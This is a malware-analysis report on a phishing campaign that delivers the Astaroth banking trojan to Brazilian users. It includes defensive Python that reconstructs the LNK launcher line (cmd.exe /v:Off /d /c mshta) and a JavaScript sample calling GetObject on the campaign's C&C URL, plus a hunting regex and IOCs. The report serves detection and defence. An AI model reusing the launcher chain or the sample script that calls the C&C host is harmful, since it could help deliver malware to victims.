
Water Makara Uses Obfuscated JavaScript in Spear Phishing Campaign, Targets Brazil With Astaroth Malware

We track this intrusion set as Water Makara. The campaign delivers Astaroth, a well-known information-stealing banking trojan that remains active as of 2024, and uses obfuscated JavaScript as its evasion technique. This article walks through the techniques Water Makara uses and recommends measures for strengthening defenses against them.

Figure 2 outlines the malware's infection chain, showing how the malicious attachment is delivered and what it is meant to execute. The attack begins with a spear phishing email crafted to look legitimate and trustworthy, often impersonating well-known companies or government agencies. This familiar social engineering ploy persuades the recipient to download the malicious ZIP attachment.

Figure 3 shows a sample Astaroth phishing email shared on Twitter by the threat hunter @9823f_. The message is framed as an "Aviso de Irregularidade" ("Notice of Irregularity"), the kind of official alert that authorities issue on tax or compliance matters to flag discrepancies that require the recipient's attention.

Inside the ZIP file is a malicious LNK file. The ZIP attached to the email in Figure 3 was not available to us, so we obtained a similar email sample separately for analysis. In that case the downloaded ZIP is named "IRPF20248328025.zip", where "IRPF" stands for "Imposto de Renda da Pessoa Física" ("Personal Income Tax"). Because personal income tax documents are both familiar and important, targets are more inclined to trust and open the file. Besides "IRPF", the campaign uses other file names to lure the user into downloading and extracting the ZIP. When the user opens the LNK file, it launches obfuscated JavaScript commands.

Alongside the LNK file, the ZIP archive contains a second file holding similar obfuscated JavaScript commands. This file is Base64-encoded; decoding it reveals the hidden malicious script. Spreading malware across several file types is a common tactic in drive-by downloads: by embedding malicious code in apparently harmless files, the attacker tricks users into launching the payload.

The campaign disguises these files under a variety of extensions, including .pdf, .jpg, .png, .gif, .mov, and .mp4.
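The two properties described above (an LNK inside the archive, and a script file masquerading under a document or media extension) can be checked before a user ever extracts the ZIP. The following is an added example written for this page, not tooling from the report: it builds a constructed archive in memory (the archive name is the one quoted above; the member names, the LNK body and the script are made up), then flags LNK members by header rather than by extension and flags members whose leading bytes do not match what their extension promises, decoding them as Base64 to see whether script markers appear.

```python
import base64
import io
import re
import zipfile

# Leading bytes a genuine file of each masqueraded extension should carry. .mov/.mp4 put a
# size-prefixed "ftyp" box at offset 4, so they are handled separately in _matches_magic().
MAGIC = {
    ".pdf": (b"%PDF",),
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Shell link header: HeaderSize 0x4C followed by the LNK CLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
# Tokens that mark decoded content as script rather than a document or image.
SCRIPT_HINTS = re.compile(rb"mshta|GetObject|unescape|ActiveXObject|WScript", re.IGNORECASE)


def _ext(name):
    i = name.lower().rfind(".")
    return name.lower()[i:] if i >= 0 else ""


def _matches_magic(ext, data):
    if ext in (".mov", ".mp4"):
        return data[4:8] == b"ftyp"
    return any(data.startswith(m) for m in MAGIC.get(ext, ()))


def _looks_base64_script(data):
    """Return the decoded bytes if `data` is Base64 text that decodes to something with script markers."""
    text = data.strip()
    if not text or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", text):
        return None
    try:
        decoded = base64.b64decode(text)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return decoded if SCRIPT_HINTS.search(decoded) else None


def triage_zip(zip_bytes):
    """Return (member name, finding) tuples for members that warrant a closer look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info.filename)
            ext = _ext(info.filename)
            if ext == ".lnk" or data.startswith(LNK_HEADER):
                findings.append((info.filename, "windows shortcut (LNK) inside archive"))
                continue
            if (ext in MAGIC or ext in (".mov", ".mp4")) and not _matches_magic(ext, data):
                if _looks_base64_script(data) is not None:
                    findings.append((info.filename, "extension masquerade: base64-encoded script"))
                else:
                    findings.append((info.filename, "extension masquerade: content does not match " + ext))
    return findings


def build_sample_zip():
    """Constructed stand-in for IRPF20248328025.zip: an LNK, a Base64 script posing as a JPEG, a real PDF."""
    script = b"var u='https://sprunal.patrimoniosoberano.world/?5/';GetObject(u);"  # constructed
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("IRPF2024.lnk", LNK_HEADER + b"\x00" * 56)   # header only; hypothetical name
        zf.writestr("IRPF2024.jpg", base64.b64encode(script))     # hypothetical name
        zf.writestr("leia-me.pdf", b"%PDF-1.4\n%benign placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, finding in triage_zip(build_sample_zip()):
        print(f"{name}: {finding}")
```

Checking the header rather than trusting the extension matters in both directions: a member named `.lnk` is obvious, but a shortcut renamed to `.pdf` is caught by `LNK_HEADER`, and a text file renamed to `.jpg` is caught because it cannot start with the JPEG marker.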

Figure 6 shows the contents of the LNK file. Its command line chains several cmd.exe switches to launch a hidden malicious JavaScript payload, and each element plays a distinct role:

  • cmd.exe: the Windows command-line interpreter
  • /v:Off: disables delayed environment variable expansion, so exclamation marks in the payload are passed through literally instead of being treated as variable delimiters
  • /d: disables execution of AutoRun commands from the registry, so the attacker's command runs without interference from whatever AutoRun entries are configured on the host
  • /c: runs the command string and then exits, so no console window lingers for the user to notice
  • mshta: the legitimate Microsoft HTML Application host (mshta.exe), which executes script supplied as an HTA file or inline; here it is abused to run the attacker's JavaScript under a signed Microsoft binary

Figure 7 shows the encoded JavaScript commands, which can be decoded with JavaScript's unescape function. The decoded script exposes a malicious URL. The variable _$_TLEN is defined as an array of two strings: a seven-character random string, which serves as a method name, and the URL.

The domain is suspicious and consistent with phishing or malware delivery infrastructure. The call to GetObject indicates that the script intends to retrieve and instantiate an object from that URL, a step that can trigger further malicious actions.

GetObject attempts to retrieve the object at the URL and execute it by invoking the method named "SXSPP29" (the seven-character string from the array) on it. Any error raised along the way is silently caught and ignored. If the JavaScript runs successfully, the endpoint contacts the Astaroth C&C server and the attacker gains a foothold on it.
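The LNK command line and the unescape-encoded payload it hands to mshta are the two artifacts an analyst triages first. The following is an added example written for this page, not code from the report or from Trend Micro. It reconstructs the described shape (a two-element array holding a seven-character method name and the C&C URL, a GetObject call on the URL, a silent catch) as a constructed sample, encodes it the way JavaScript's escape() would, and then does what the analyst does in reverse: recognizes the cmd.exe /v:off /d /c ... mshta launcher, pulls the unescape() argument out of the command line, decodes it, and extracts the method name and URL. Passing the script to mshta inline through a javascript: URL is this example's assumption; the report shows the switches and mshta but not the exact argument form.

```python
import re

# Characters that JavaScript's escape() leaves untouched; everything else becomes %XX or %uXXXX.
_JS_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")
_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_escape(text):
    """Mirror of JavaScript escape(); used here only to build the constructed sample."""
    out = []
    for ch in text:
        cp = ord(ch)
        if ch in _JS_SAFE:
            out.append(ch)
        elif cp < 0x100:
            out.append("%%%02X" % cp)
        else:
            out.append("%%u%04X" % cp)
    return "".join(out)


def js_unescape(text):
    """Mirror of JavaScript unescape(): decode %XX and %uXXXX, leave malformed sequences alone."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


# Constructed script reproducing the shape the report describes (not a captured sample).
SAMPLE_JS = (
    "var _$_TLEN=['SXSPP29','https://sprunal.patrimoniosoberano.world/?5/'];"
    "try{GetObject(_$_TLEN[1])[_$_TLEN[0]]();}catch(e){}"
)
# Assumed launcher line: switches and mshta as in the report, script passed inline (assumption).
SAMPLE_CMDLINE = (
    'C:\\Windows\\System32\\cmd.exe /v:Off /d /c mshta "javascript:eval(unescape(\''
    + js_escape(SAMPLE_JS) + "'))\""
)

_SWITCH_RE = re.compile(r"(?<!\S)/(v:off|v:on|d|c|k|q|s)(?=\s|$)")
_MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b")
_UNESCAPE_ARG_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
_ARRAY_RE = re.compile(r"var\s+(\S+?)\s*=\s*\[\s*'([^']*)'\s*,\s*'([^']*)'\s*\]")
_URL_RE = re.compile(r"https?://[^\s'\"\]\)]+")


def is_lnk_style_mshta_launch(cmdline):
    """True when cmd.exe is driven with /v:off, /d and /c and hands off to mshta."""
    lowered = cmdline.lower()
    switches = set(_SWITCH_RE.findall(lowered))
    return bool(_MSHTA_RE.search(lowered)) and {"v:off", "d", "c"} <= switches


def extract_iocs(decoded_js):
    """Pull the array name, method name, URL(s) and GetObject usage out of decoded script."""
    array_name = method = url = None
    m = _ARRAY_RE.search(decoded_js)
    if m:
        array_name = m.group(1)
        strings = [m.group(2), m.group(3)]
        url = next((s for s in strings if _URL_RE.fullmatch(s)), None)   # whichever element is the URL
        method = next((s for s in strings if s != url), None)            # the other one is the method
    return {
        "array": array_name,
        "method": method,
        "url": url,
        "urls": _URL_RE.findall(decoded_js),
        "uses_getobject": "GetObject(" in decoded_js,
    }


def triage_cmdline(cmdline):
    """Full chain: flag the launcher, pull out the unescape() argument, decode it, extract IOCs."""
    result = {"suspicious_launcher": is_lnk_style_mshta_launch(cmdline), "decoded": None, "iocs": None}
    m = _UNESCAPE_ARG_RE.search(cmdline)
    if m:
        result["decoded"] = js_unescape(m.group(1))
        result["iocs"] = extract_iocs(result["decoded"])
    return result


if __name__ == "__main__":
    verdict = triage_cmdline(SAMPLE_CMDLINE)
    print("launcher pattern:", verdict["suspicious_launcher"])
    print("decoded:", verdict["decoded"])
    print("IOCs:", verdict["iocs"])
```

The launcher check keys on the switch combination plus the hand-off to mshta rather than on any string from the payload, so it still fires when the attacker rotates the encoded script, while the decoder is what yields the URL to block and the method name to pivot on.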

The URLs share common traits. All sit under the domain patrimoniosoberano[.]world, which implies a single registered domain, while the subdomains and paths vary.

Each URL uses a distinct subdomain but follows the same naming scheme:

  • hxxps[://]pritonggopatrimoniosoberano[.]world/?5/
  • hxxps[://]pritongongor[.]patrimoniosoberano[.]world/?5/
  • hxxps[://]spunalu[.]patrimoniosoberano[.]world/?5/
  • hxxps[://]sprunal[.]patrimoniosoberano[.]world/?5/

Moreover, each URL ends with the same path, /?5/, which points to a consistent resource or parameter structure behind the varying hostnames. This churn of hostnames resembles a domain generation algorithm (DGA), a technique widely used by malware to produce many domain names algorithmically. Note that all of the hosts listed above share one registered domain, so a block on patrimoniosoberano[.]world covers every subdomain variant, whereas a classic DGA rotates registered domains and needs a different defense.

According to the list of indicators of compromise (IoCs), the second-level domains (SLDs) of the URLs follow a similar format, suggesting that they may use the same C&C servers as Astaroth. While Trend Micro has blocked the known behaviors linked to this malware, users should remain alert to the risks posed by this phishing campaign.

We continue to monitor this campaign. At present, no significant payloads have been observed on endpoints, thanks to the existing countermeasures against these behaviors. Trend Micro solutions block this threat at its initial stage.

Although Astaroth is an old banking trojan, its resurgence and continued development make it a persistent threat. Beyond data theft, its impact extends to lasting damage to customer trust, regulatory fines, higher costs from operational disruption and downtime, and the expense of recovery and remediation.

Water Makara's spear phishing approach depends on unsuspecting users opening the malicious files, which highlights the central role of user awareness. Organizations should also adopt best practices such as regular security training, strong password policies, multifactor authentication (MFA), up-to-date security solutions and software, and the principle of least privilege.

Trend Micro solutions have already detected, blocked, and mitigated this threat:

  • Email Security includes a search query that can serve as a filter to block malicious emails, identifying and quarantining deceptive messages before they reach users.

Endpoint protection:

  • Apex One provides advanced threat detection and response to identify and mitigate suspicious activity such as the execution of obfuscated JavaScript commands.
  • Cloud App Security adds a layer of protection for cloud-based email services such as Office 365 and Google Workspace, inspecting and blocking malicious attachments and links before they reach the inbox.
  • Deep Security provides comprehensive network security controls, including real-time analysis and protection against threats.
  • Deep Discovery Analyzer uses behavioral analysis and sandboxing to understand what obfuscated JavaScript commands do and what their likely impact is.

Trend Micro's solutions also include Playbook rules that can block, flag, and respond to suspicious file types, such as LNK files, which are frequently used in phishing campaigns.

  • Vision One provides extended detection and response capabilities that continuously monitor the environment for IoCs and anomalous behavior. Its Threat Insights deliver intelligence on threat actors, their campaigns, and their techniques, helping organizations proactively harden their environments, reduce risk, and respond to threats efficiently. The Vision One Search App can also be used to match or hunt for the IoCs across the organization's environment.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

[TAD Emerging Threat Analysis]: Obfuscated JavaScript commands with malicious URL in LATAM

Trend Micro Vision One Threat Insights App

Threat Actor/s: Water Makara

Emerging Threats: Surge in Obfuscated JavaScript Commands Executed via mshta.exe Targeting Brazil with Phishing Campaigns

Trend Micro Vision One Search App – Hunting Queries

Potential malicious HTTPS request to Astaroth's C&C server:

request:/https://.*(.world|.org|.io|.net|.city|.com|.cfd|.xyz)(/?[0-9]/)/

Read as a standard regular expression, the dots in the TLD group are unescaped (so ".io" matches any character followed by "io") and "/?" makes the slash optional rather than matching the literal "?" in the /?5/ path. Validate the pattern against the IOCs listed above, and tighten it, before relying on it for alerting.
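Running the hunting pattern over sample traffic is the quickest way to see what it does and does not catch. The following is an added example for this page, not Trend Micro's query or tooling: it compiles the pattern above verbatim as a Python regex beside a tightened version (dots and the "?" escaped, host limited to hostname characters, path anchored), and applies both to a constructed request log whose first two lines are IOCs quoted in the report and whose remaining lines are made-up benign traffic. The IOC list and benign lines are constructed here; the tightened pattern is this example's suggestion.

```python
import re

# The page's Vision One hunting pattern, copied verbatim into a Python regex.
VENDOR_PATTERN = re.compile(r"https://.*(.world|.org|.io|.net|.city|.com|.cfd|.xyz)(/?[0-9]/)")

# Tightened form (this example's suggestion, not the report's): dots and "?" escaped so the
# TLD and the literal "/?<digit>/" path are matched, host restricted to hostname characters.
TIGHT_PATTERN = re.compile(
    r"^https://(?:[a-z0-9-]+\.)+(?:world|org|io|net|city|com|cfd|xyz)/\?[0-9]/$",
    re.IGNORECASE,
)

# Constructed request log: the first two entries are IOCs quoted in the report, the rest are
# made-up benign requests that a corporate proxy might see.
SAMPLE_REQUESTS = [
    "https://sprunal.patrimoniosoberano.world/?5/",
    "https://pritongongor.patrimoniosoberano.world/?5/",
    "https://example.com/icons/io/1/",      # "/io" + "/1/" satisfies the unescaped vendor pattern
    "https://updates.example.net/v2/3/",
    "https://www.example.org/",
]


def hunt(requests, pattern):
    """Return the request URLs that the compiled pattern flags, in input order."""
    return [r for r in requests if pattern.search(r)]


if __name__ == "__main__":
    print("vendor pattern hits:", hunt(SAMPLE_REQUESTS, VENDOR_PATTERN))
    print("tightened pattern hits:", hunt(SAMPLE_REQUESTS, TIGHT_PATTERN))
```

Against this log the verbatim pattern misses both IOCs (after ".world" it needs an optional slash followed by a digit, and the real path has a "?" there) while flagging the benign `/icons/io/1/` request, whereas the tightened pattern flags exactly the two IOCs. Tune the TLD list and path digit range to what the IOC list actually shows before deploying either.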

Indicators of Compromise (IOCs)

The detailed list of IOCs can be accessed here.

MITRE ATT&CK® techniques

Tactic               Technique                                               ID
Initial Access       Phishing: Spearphishing Attachment                      T1566.001
Execution            User Execution: Malicious File                          T1204.002
Execution            Command and Scripting Interpreter: JavaScript           T1059.007
Defense Evasion      System Binary Proxy Execution: Mshta                    T1218.005
Defense Evasion      Masquerading: Masquerade File Type                      T1036.008
Command and Control  Dynamic Resolution: Domain Generation Algorithms        T1568.002
